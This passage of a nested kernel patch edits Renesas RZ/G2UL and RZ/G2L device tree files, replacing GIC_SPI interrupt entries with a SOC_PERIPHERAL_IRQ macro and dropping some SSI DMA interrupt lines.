++				     <SOC_PERIPHERAL_IRQ(412) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCI1_CLKP>;
+ 			clock-names = "fck";
+@@ -369,14 +363,14 @@
+ 		canfd: can@10050000 {
+ 			compatible = "renesas,r9a07g043-canfd", "renesas,rzg2l-canfd";
+ 			reg = <0 0x10050000 0 0x8000>;
+-			interrupts = <GIC_SPI 426 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 427 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 422 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 424 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 428 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 423 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 425 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 429 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(426) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(427) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(422) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(424) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(428) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(423) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(425) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(429) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "g_err", "g_recc",
+ 					  "ch0_err", "ch0_rec", "ch0_trx",
+ 					  "ch1_err", "ch1_rec", "ch1_trx";
+@@ -405,14 +399,14 @@
+ 			#size-cells = <0>;
+ 			compatible = "renesas,riic-r9a07g043", "renesas,riic-rz";
+ 			reg = <0 0x10058000 0 0x400>;
+-			interrupts = <GIC_SPI 350 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 348 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 349 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 352 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 353 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 351 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 354 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 355 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(350) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(348) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(349) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(352) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(353) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(351) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(354) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(355) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "tei", "ri", "ti", "spi", "sti",
+ 					  "naki", "ali", "tmoi";
+ 			clocks = <&cpg CPG_MOD R9A07G043_I2C0_PCLK>;
+@@ -427,14 +421,14 @@
+ 			#size-cells = <0>;
+ 			compatible = "renesas,riic-r9a07g043", "renesas,riic-rz";
+ 			reg = <0 0x10058400 0 0x400>;
+-			interrupts = <GIC_SPI 358 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 356 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 357 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 360 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 361 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 359 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 362 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 363 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(358) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(356) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(357) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(360) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(361) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(359) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(362) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(363) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "tei", "ri", "ti", "spi", "sti",
+ 					  "naki", "ali", "tmoi";
+ 			clocks = <&cpg CPG_MOD R9A07G043_I2C1_PCLK>;
+@@ -449,14 +443,14 @@
+ 			#size-cells = <0>;
+ 			compatible = "renesas,riic-r9a07g043", "renesas,riic-rz";
+ 			reg = <0 0x10058800 0 0x400>;
+-			interrupts = <GIC_SPI 366 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 364 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 365 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 368 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 369 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 367 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 370 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 371 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(366) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(364) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(365) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(368) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(369) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(367) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(370) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(371) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "tei", "ri", "ti", "spi", "sti",
+ 					  "naki", "ali", "tmoi";
+ 			clocks = <&cpg CPG_MOD R9A07G043_I2C2_PCLK>;
+@@ -471,14 +465,14 @@
+ 			#size-cells = <0>;
+ 			compatible = "renesas,riic-r9a07g043", "renesas,riic-rz";
+ 			reg = <0 0x10058c00 0 0x400>;
+-			interrupts = <GIC_SPI 374 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 372 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 373 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 376 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 377 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 375 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 378 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 379 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(374) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(372) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(373) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(376) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(377) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(375) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(378) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(379) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "tei", "ri", "ti", "spi", "sti",
+ 					  "naki", "ali", "tmoi";
+ 			clocks = <&cpg CPG_MOD R9A07G043_I2C3_PCLK>;
+@@ -491,7 +485,7 @@
+ 		adc: adc@10059000 {
+ 			compatible = "renesas,r9a07g043-adc", "renesas,rzg2l-adc";
+ 			reg = <0 0x10059000 0 0x400>;
+-			interrupts = <GIC_SPI 347 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(347) IRQ_TYPE_EDGE_RISING>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_ADC_ADCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_ADC_PCLK>;
+ 			clock-names = "adclk", "pclk";
+@@ -551,10 +545,10 @@
+ 		sysc: system-controller@11020000 {
+ 			compatible = "renesas,r9a07g043-sysc";
+ 			reg = <0 0x11020000 0 0x10000>;
+-			interrupts = <GIC_SPI 42 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 43 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 44 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 45 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(42) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(43) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(44) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(45) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "lpm_int", "ca55stbydone_int",
+ 					  "cm33stbyr_int", "ca55_deny";
+ 			status = "disabled";
+@@ -578,23 +572,23 @@
+ 				     "renesas,rz-dmac";
+ 			reg = <0 0x11820000 0 0x10000>,
+ 			      <0 0x11830000 0 0x10000>;
+-			interrupts = <GIC_SPI 141 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 125 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 126 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 127 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 128 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 129 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 130 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 131 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 132 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 133 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 134 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 135 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 136 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 137 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 138 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 139 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 140 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(141) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(125) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(126) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(127) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(128) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(129) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(130) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(131) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(132) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(133) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(134) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(135) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(136) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(137) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(138) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(139) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(140) IRQ_TYPE_EDGE_RISING>;
+ 			interrupt-names = "error",
+ 					  "ch0", "ch1", "ch2", "ch3",
+ 					  "ch4", "ch5", "ch6", "ch7",
+@@ -623,8 +617,8 @@
+ 			compatible = "renesas,sdhi-r9a07g043",
+ 				     "renesas,rcar-gen3-sdhi";
+ 			reg = <0x0 0x11c00000 0 0x10000>;
+-			interrupts = <GIC_SPI 104 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 105 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(104) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(105) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_SDHI0_IMCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_SDHI0_CLK_HS>,
+ 				 <&cpg CPG_MOD R9A07G043_SDHI0_IMCLK2>,
+@@ -639,8 +633,8 @@
+ 			compatible = "renesas,sdhi-r9a07g043",
+ 				     "renesas,rcar-gen3-sdhi";
+ 			reg = <0x0 0x11c10000 0 0x10000>;
+-			interrupts = <GIC_SPI 106 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 107 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(106) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(107) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_SDHI1_IMCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_SDHI1_CLK_HS>,
+ 				 <&cpg CPG_MOD R9A07G043_SDHI1_IMCLK2>,
+@@ -655,9 +649,9 @@
+ 			compatible = "renesas,r9a07g043-gbeth",
+ 				     "renesas,rzg2l-gbeth";
+ 			reg = <0 0x11c20000 0 0x10000>;
+-			interrupts = <GIC_SPI 84 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 86 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(84) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(85) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(86) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "mux", "fil", "arp_ns";
+ 			phy-mode = "rgmii";
+ 			clocks = <&cpg CPG_MOD R9A07G043_ETH0_CLK_AXI>,
+@@ -675,9 +669,9 @@
+ 			compatible = "renesas,r9a07g043-gbeth",
+ 				     "renesas,rzg2l-gbeth";
+ 			reg = <0 0x11c30000 0 0x10000>;
+-			interrupts = <GIC_SPI 87 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 88 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 89 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(87) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(88) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(89) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "mux", "fil", "arp_ns";
+ 			phy-mode = "rgmii";
+ 			clocks = <&cpg CPG_MOD R9A07G043_ETH1_CLK_AXI>,
+@@ -705,7 +699,7 @@
+ 		ohci0: usb@11c50000 {
+ 			compatible = "generic-ohci";
+ 			reg = <0 0x11c50000 0 0x100>;
+-			interrupts = <GIC_SPI 91 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(91) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H0_HCLK>;
+ 			resets = <&phyrst 0>,
+@@ -719,7 +713,7 @@
+ 		ohci1: usb@11c70000 {
+ 			compatible = "generic-ohci";
+ 			reg = <0 0x11c70000 0 0x100>;
+-			interrupts = <GIC_SPI 96 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(96) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H1_HCLK>;
+ 			resets = <&phyrst 1>,
+@@ -733,7 +727,7 @@
+ 		ehci0: usb@11c50100 {
+ 			compatible = "generic-ehci";
+ 			reg = <0 0x11c50100 0 0x100>;
+-			interrupts = <GIC_SPI 92 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(92) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H0_HCLK>;
+ 			resets = <&phyrst 0>,
+@@ -748,7 +742,7 @@
+ 		ehci1: usb@11c70100 {
+ 			compatible = "generic-ehci";
+ 			reg = <0 0x11c70100 0 0x100>;
+-			interrupts = <GIC_SPI 97 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(97) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H1_HCLK>;
+ 			resets = <&phyrst 1>,
+@@ -764,7 +758,7 @@
+ 			compatible = "renesas,usb2-phy-r9a07g043",
+ 				     "renesas,rzg2l-usb2-phy";
+ 			reg = <0 0x11c50200 0 0x700>;
+-			interrupts = <GIC_SPI 94 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(94) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H0_HCLK>;
+ 			resets = <&phyrst 0>;
+@@ -777,7 +771,7 @@
+ 			compatible = "renesas,usb2-phy-r9a07g043",
+ 				     "renesas,rzg2l-usb2-phy";
+ 			reg = <0 0x11c70200 0 0x700>;
+-			interrupts = <GIC_SPI 99 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(99) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H1_HCLK>;
+ 			resets = <&phyrst 1>;
+@@ -790,10 +784,10 @@
+ 			compatible = "renesas,usbhs-r9a07g043",
+ 				     "renesas,rza2-usbhs";
+ 			reg = <0 0x11c60000 0 0x10000>;
+-			interrupts = <GIC_SPI 100 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 101 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 102 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 103 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(100) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(101) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(102) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(103) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2P_EXR_CPUCLK>;
+ 			resets = <&phyrst 0>,
+@@ -812,8 +806,8 @@
+ 			clocks = <&cpg CPG_MOD R9A07G043_WDT0_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_WDT0_CLK>;
+ 			clock-names = "pclk", "oscclk";
+-			interrupts = <GIC_SPI 49 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 50 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(49) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(50) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "wdt", "perrout";
+ 			resets = <&cpg R9A07G043_WDT0_PRESETN>;
+ 			power-domains = <&cpg>;
+@@ -839,7 +833,7 @@
+ 			compatible = "renesas,r9a07g043-ostm",
+ 				     "renesas,ostm";
+ 			reg = <0x0 0x12801000 0x0 0x400>;
+-			interrupts = <GIC_SPI 46 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(46) IRQ_TYPE_EDGE_RISING>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_OSTM0_PCLK>;
+ 			resets = <&cpg R9A07G043_OSTM0_PRESETZ>;
+ 			power-domains = <&cpg>;
+@@ -850,7 +844,7 @@
+ 			compatible = "renesas,r9a07g043-ostm",
+ 				     "renesas,ostm";
+ 			reg = <0x0 0x12801400 0x0 0x400>;
+-			interrupts = <GIC_SPI 47 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(47) IRQ_TYPE_EDGE_RISING>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_OSTM1_PCLK>;
+ 			resets = <&cpg R9A07G043_OSTM1_PRESETZ>;
+ 			power-domains = <&cpg>;
+@@ -861,7 +855,7 @@
+ 			compatible = "renesas,r9a07g043-ostm",
+ 				     "renesas,ostm";
+ 			reg = <0x0 0x12801800 0x0 0x400>;
+-			interrupts = <GIC_SPI 48 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(48) IRQ_TYPE_EDGE_RISING>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_OSTM2_PCLK>;
+ 			resets = <&cpg R9A07G043_OSTM2_PRESETZ>;
+ 			power-domains = <&cpg>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+new file mode 100644
+index 0000000000000..96f935bc2d4d1
+--- /dev/null
++++ b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+@@ -0,0 +1,12 @@
++// SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
++/*
++ * Device Tree Source for the RZ/G2UL SoC
++ *
++ * Copyright (C) 2022 Renesas Electronics Corp.
++ */
++
++#include <dt-bindings/interrupt-controller/arm-gic.h>
++
++#define SOC_PERIPHERAL_IRQ(nr)		GIC_SPI nr
++
++#include "r9a07g043.dtsi"
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043u11-smarc.dts b/arch/arm64/boot/dts/renesas/r9a07g043u11-smarc.dts
+index 059885a01ede9..01483b4302c25 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043u11-smarc.dts
++++ b/arch/arm64/boot/dts/renesas/r9a07g043u11-smarc.dts
+@@ -17,7 +17,7 @@
+ #define SW_SW0_DEV_SEL	1
+ #define SW_ET0_EN_N	1
+ 
+-#include "r9a07g043.dtsi"
++#include "r9a07g043u.dtsi"
+ #include "rzg2ul-smarc-som.dtsi"
+ #include "rzg2ul-smarc.dtsi"
+ 
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+index 2283d4fb87363..7dbf6a6292f49 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+@@ -174,9 +174,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -195,9 +194,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -215,10 +213,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -237,9 +233,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+index 358d4c34465fa..e000510b90a42 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+@@ -174,9 +174,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -195,9 +194,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
